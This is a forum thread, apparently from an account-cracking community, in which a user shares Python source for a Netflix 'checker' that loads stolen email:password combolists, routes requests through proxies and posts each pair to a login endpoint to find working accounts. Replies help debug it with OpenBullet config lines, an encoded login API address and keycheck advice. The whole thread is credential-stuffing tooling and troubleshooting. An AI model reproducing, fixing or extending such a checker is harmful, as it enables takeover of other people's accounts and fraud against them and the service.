OP14 July, 2022 - 07:36 PM(This post was last modified: 14 July, 2022 - 07:55 PM by JayTeeX69. Edited 1 time in total.)
Reply
Guys so this is problem when i am running netflix cheker for accounts that do not work it says they do work . Idk why i tested status code evrything is ok.
Here is src so you guys can test it if you want and let me know the problem.
import requests
import os
clear = lambda: os.system("cls" if os.name == "nt" else "clear")
def main_menu():
print("CHEKER MADE BY JAY :) \n")
print("MAIN MENU")
print("================================================")
print("[1] NETFLIX CHEKER")
print("[2] QUIT")
main_menu()
def options():
option = input("Pick a option: ")
if option == "1":
None
else: exit()
options()
clear()
proxy_type = input("
Proxy Type (http/https/socks5) | Enter nothing to use without Proxy: ")
with open("proxy.txt", "r") as proxy_file:
proxies = proxy_file.readlines()
for proxy in proxies:
proxy_username = proxy.split(":")[0]
proxy_password = proxy.split(":")[1]
proxy_host = proxy.split(":")[2]
proxy_port = proxy.split(":")[3]
proxy_formatted = f"{proxy_type}://{proxy_username}:{proxy_password}@{proxy_host}:{proxy_port}"
if proxy_type != "": proxy_auth = {"all://": proxy_formatted}
else: proxy_auth = {"all://": None}
clear()
def netflix_cheker():
with open("combolist.txt","r") as f:
combolist = f.readlines()
for combo in combolist:
kek = combo.split(":")
email = kek[0]
password = kek[1]
headers = {
"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
}
login_data = {
"userLoginId": email,
"password": password
}
r = requests.post(" https://netflix.com/",data=login_data,headers=headers,proxies=proxy_auth if proxy_type != "" else None)
if r.status_code ==200:
print("Good:",email+":"+password)
Try this in Openbullet
Public Api tho
\ I heard Teddybear saying they normally used token based Api
example myCANAL Api for Netflix
or Api Shakti Netflix works
Code:
REQUEST GET "https://www.netflix.com/login"
HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"
HEADER "Pragma: no-cache"
HEADER "Accept: */*"
#flwssn PARSE "<COOKIES(flwssn)>" JSON "" -> VAR "flwssn"
#API4 FUNCTION Base64Decode "aHR0cHM6Ly9hcGktZXUtc3RhZ2luZy5uZXRmbGl4LmNvbS9hY2NvdW50L2F1dGg=" -> VAR "API4"
I'm not a coder at all, so take my advice with a grain of salt. Are you sure your 'config' is even correct?
You're sending a POST request to "https://netflix.com" and your payload is incorrect. Your keycheck is essentially the bot returning SUCCESS if it doesn't match "Incorrect password", but it won't match that FAIL keycheck anyway, because the entire request is wrong. It's most likely sending you a different error response, and your bot is misidentifying it as a SUCCESS. You should also be setting a proper SUCCESS keycheck.
Either way, the configuration is incorrect and won't login to Netflix.
so you are doing not in r.text: this the issue it prob doesnt even try to login on your "api" therefor it will never contain it hence why its marked as a valid here is a real netlfix login API:
For the actual CFG feel free to dm me this API is know to give loads of false bads because on netflix you need previous IP acces to login so allot of acc's that are valid will register as falls. If your're dedicated try finding a API but i doubt its still a thing maybe a third party service? cheers and gl
https://prnt.sc/NebIZagtMPx7
Pls read what i said sir Fivio and i never asked ang for help he just replaied so i said politley thank you. What do you want me to say? Fuck off skid or something like that.
I'm not a coder at all, so take my advice with a grain of salt. Are you sure your 'config' is even correct?
You're sending a POST request to "https://netflix.com" and your payload is incorrect. Your keycheck is essentially the bot returning SUCCESS if it doesn't match "Incorrect password", but it won't match that FAIL keycheck anyway, because the entire request is wrong. It's most likely sending you a different error response, and your bot is misidentifying it as a SUCCESS. You should also be setting a proper SUCCESS keycheck.
Either way, the configuration is incorrect and won't login to Netflix.